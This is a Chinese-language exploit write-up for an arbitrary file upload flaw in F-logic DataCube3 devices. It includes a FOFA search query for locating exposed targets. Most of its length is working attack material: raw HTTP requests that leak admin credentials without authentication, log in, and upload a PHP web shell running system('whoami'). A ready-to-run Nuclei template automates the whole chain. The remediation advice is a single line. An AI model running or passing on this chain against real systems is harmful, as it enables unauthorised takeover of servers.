免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
Ⅰ、漏洞描述
F-logic DataCube3 /admin/setting_photo.php接口处存在任意任意文件上传漏洞,恶意攻击者可通过该漏洞在服务器端写入后门,获取服务器权限,进而控制整个web服务器。
Ⅱ、fofa语句
title=="DataCube3"
Ⅲ、漏洞复现
POC-1
GET /admin/config_all.php HTTP/1.1
Host: your-ip
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alivePOC-2
POST /admin/config_all.php HTTP/1.1
Host: your-ip
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
user_id=用户名&user_pw=密码&login=%25E3%2583%25AD%25E3%2582%25B0%25E3%2582%25A4%25E3%2583%25B3POC-3
GET /admin/setting_photo.php HTTP/1.1
Host: your-ip
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: 登录后的cookiePOC-4
POST /admin/setting_photo.php HTTP/1.1
Host: your-ip
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data;boundary=---------------------------113389720123090127612523184396
Cookie: 登录后的cookie
-----------------------------113389720123090127612523184396
Content-Disposition: form-data; name="add"
.............................
-----------------------------113389720123090127612523184396
Content-Disposition: form-data; name="addPhoto"; filename="1.php"
Content-Type: image/jpeg
<?php system("whoami");?>
-----------------------------113389720123090127612523184396
Content-Disposition: form-data; name="accesstime"
accesstime的值
-----------------------------113389720123090127612523184396--1、发送数据包,未授权获取登录账号密码
2、通过获取的账号密码获取COOKIE
3、使用获取到的cookie获取accesstime值
4、上传文件
5、访问上传文件
https://127.0.0.1/images/slideshow/ppp.php
Ⅳ、Nuclei-POC
id: F-logic-DataCube3-uploadfile
info:
name: F-logic DataCube3 /admin/setting_photo.php接口处存在任意任意文件上传漏洞,恶意攻击者可通过该漏洞在服务器端写入后门,获取服务器权限,进而控制整个web服务器。
author: WLF
severity: high
metadata:
fofa-query: title=="DataCube3"
variables:
filename: "{{to_lower(rand_base(10))}}"
boundary: "{{to_lower(rand_base(20))}}"
http:
- raw:
- |
GET /admin/config_all.php HTTP/1.1
Host: {{Hostname}}
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
- |
POST /admin/config_all.php HTTP/1.1
Host: {{Hostname}}
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
user_id={{path1}}&user_pw={{path}}&login=%25E3%2583%25AD%25E3%2582%25B0%25E3%2582%25A4%25E3%2583%25B3
- |
GET /admin/setting_photo.php HTTP/1.1
Host: {{Hostname}}
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
- |
POST /admin/setting_photo.php HTTP/1.1
Host: {{Hostname}}
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data;boundary=---------------------------113389720123090127612523184396
-----------------------------113389720123090127612523184396
Content-Disposition: form-data; name="add"
.............................
-----------------------------113389720123090127612523184396
Content-Disposition: form-data; name="addPhoto"; filename="{{filename}}.php"
Content-Type: image/jpeg
<?php echo md5('666');unlink(__FILE__);?>
-----------------------------113389720123090127612523184396
Content-Disposition: form-data; name="accesstime"
0.{{path2}}
-----------------------------113389720123090127612523184396--
- |
GET /images/slideshow/{{filename}}.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
- |
extractors:
- type: regex
name: path
group: 1
regex:
- '"login.root_pwd","value":"(\w*-\w*)"'
internal: true
- type: regex
name: path1
group: 1
regex:
- '"login.root_id","value":"(\w*)"'
internal: true
- type: regex
name: path2
group: 1
regex:
- 'name="accesstime" value="0.(\w*\ (\w*))"'
internal: true
matchers:
- type: dsl
dsl:
- status_code==200 && contains_all(body,"fae0b27c451c728867a567e8c1bb4e53")Ⅴ、修复建议
升级至安全版本
